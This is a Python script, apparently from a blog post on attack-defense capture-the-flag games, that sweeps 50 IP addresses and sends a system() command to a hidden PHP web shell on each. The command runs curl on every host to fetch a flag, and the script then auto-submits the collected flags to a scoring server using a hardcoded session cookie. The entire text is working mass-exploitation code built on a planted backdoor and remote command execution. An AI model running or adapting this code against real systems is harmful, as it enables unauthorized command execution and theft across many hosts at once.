import requests
def get_flag():
    for i in range(1,51):
        url='http://4.3.'+str(i)+'.101/logs/.config.php'
        data={
                1:"system('curl http://172.21.0.1/Getkey');"
            }
        headers = {
            'User-Agent':'flag'
        }
        result=requests.post(url,data=data,headers=headers).content.decode('utf-8')
        if len(result)<50:
            with open(r'flag.txt', 'a+') as f:
                f.write(result + '\n')
                f.close()
            print(result)

def submit_flag():
    for flag in open('flag.txt'):
        flag=flag.replace('\n','')
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
            "X-Requested-With": "XMLHttpRequest",
            "Host":"172.21.0.1",
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": "http://172.21.0.1/",
            "Cookie": "PHPSESSID=eas4l327930tm7nbvscj4fvi93",
        }
        datas = {"answer": flag}
        url='http://172.21.0.1/Title/TitleView/savecomprecord'
        try:
            r = requests.post(url, data=datas,headers=headers)
            print(r.text)
            print(r.status_code)
        except:
            pass
if __name__ == '__main__':
    get_flag()
    submit_flag()
最后修改:2021 年 06 月 19 日 02 : 49 PM
如果觉得我的文章对你有用,请随意赞赏